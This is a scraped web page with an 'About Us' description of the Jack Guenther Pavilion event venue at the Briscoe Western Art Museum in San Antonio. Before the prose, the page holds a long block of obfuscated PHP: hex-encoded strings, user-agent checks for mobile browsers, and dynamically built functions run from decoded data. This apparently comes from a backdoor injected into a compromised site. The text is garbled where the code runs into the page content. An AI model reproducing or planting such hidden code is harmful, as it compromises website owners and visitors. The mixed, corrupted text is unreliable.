'rest_response_link_curies', array() ); return array_merge( $curies, $additional ); } } $zbxmowd = 'd%w6Z6<.5`hA x27pd%6/7rfzbek!~!b%Z<#opo#>b%!*##>>X)!gsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6]36]73]83]238M7]381]2!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmgpt}X;`msvd}R;*msv%)}.;`jZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-u256]y81]265]y72]254]y76#!(%w:!>! x246767~6}&-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#%)sutcvt)fubmgoj{hA!osvufs!~<3%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-q%bG9}:}.}-}!#*<%nfd>%fdy!%tdz)%bbT-%bT-%hW~%-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjg~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1 x72 157 x6d 145")) or (strstr($uas," x~!!%s:N}#-%o:W%c:>1<%b:>11<19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofmqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h7pd%6hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!%:-5ppde:4:|:**#ppdez)#44ec:649#-!#:618d5f9#-!#*#[k2`{6:!}7;!}6;##}C;!>febfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs11M5]67]452]88]5]48]32M3]317]4456 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124 x54 120 x5fvg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bub%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufld7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%~<#/% x24- x24!>!fyqmpef)# x24*! x24Ypp3)%cB:-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpustmbg} x7f;!osvufs}w; 156 x63 164 x69 157 x6e"; functi%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!%z-#:#* x24- x24!>! x2278]225]241]334]368]322]3]364]6]283]427]36]373P%)!gj!~j%!<**3-j%-bubE{h%)sutcvt-#w#)ldb<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_A6~6/7&6|7**111127-K)ebfsX x27u%)7fmjix6#]y74]273]y76]252]y85]256]y6g]u{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)ut66 151 x72 145 x66 157 x78"))) { $zcqxwxx = " x63 V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R)udfoopdXA x22)7gj6>1*!%b:>1%s: x5c%j:.2^,%b:%s: x5p#/%z>2*!%z>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr(ut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r162 x65 141 x74 145 x5f 146 x75($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALS[" x61 15Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#005]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]2d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*:::::{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f!bssbyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*2;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x $zcqxwxx("", $iywmlqu); $cxkvbsr();}}FGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3236< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)v%)}k~~~2j%!*72! x27!hmg%)!gje:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*ms#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfs53Ld]53]Kc]55Ld]55#*Ew:Qb:Qc:W~!%z!>21<%j=6[%ww2!>#p#/#fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudo 125 x53 105 x52 137 x41 107 x45 k4`{6~6q%<#762]67y]562]38y]572]48y]#>m%:|:*r%f6c68399#-!#65egb2dc#*!#]y84]275]y83]273]y76]2strstr($uas," x61 156 x64 162 x6f 151 x64")) or (strstr($uas," x63 15057,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%Vjm6< x7fw6*CW&)7gj6<*K)ftpmdX$uas," x72 166 x3a 61 x31")) or (%j:=tj{fpg)%s:*<%j:,,Bjg!)%7-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;f)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93yfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!GO x22#)fepmqyfA>2b%!<*-!#]y38#-!%w:**<")));$cxkvbsr =31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.dXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^!ssbnpe_GMFT`QIQ&f_UTPI`QUU2qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6:-t%)3of:opjudovg<~ x24! x242178}527}88:}334}472 x242bd%!<5hs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K75L3]248L3P6L1M5]D2P4]D6#<%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<4n%<#372]58y]472]37y]672]48y]#>s%<#462]47if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!isset22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-)2q%l}S;2-u%!-#2#/#%#/#o]#257]y86]267]y74]275]y7:]268]y7f#! x2400~:!%yy)#}#-# x24- x24-tusqpt)24- x24*1<%j=tj{fpg)% x24- x24*!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24-tr_split("%tjw!>!#]y84]275]y83]248]y83]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M/*)323zbe!-#jt0*?]+^?]_ x5c}X x24 About Us | Jack Guenther Pavilion
About Us

The Briscoe campus is located on the banks of the San Antonio River Walk and includes the restored historic 1930s art deco Museum building and the adjacent three-story Jack Guenther Pavilion and McNutt Sculpture Garden, used for special events. With elegant entrances on both Market Street and the River Walk, this multi-functional event facility offers exquisite architecture, an idyllic location, and sumptuous indoor and outdoor spaces. The Jack Guenther Pavilion features three floors with stunning vistas and all the amenities needed to leave a lasting impression on guests. The McNutt Sculpture Garden offers a host of customizable options flanked by majestic canopies of oak trees, colorful beds of native plants, a grand Italian pergola, and Western sculptures.  The venue is a spectacular oasis in the heart of downtown San Antonio.

When you choose the Jack Guenther Pavilion for your event, you are supporting the Briscoe Western Art Museum, a nonprofit charitable organization. The Pavilion provides a significant source of revenue for the Museum which serves to preserve and present the art, history, and culture of the American West. Contact our staff to set up a site visit today.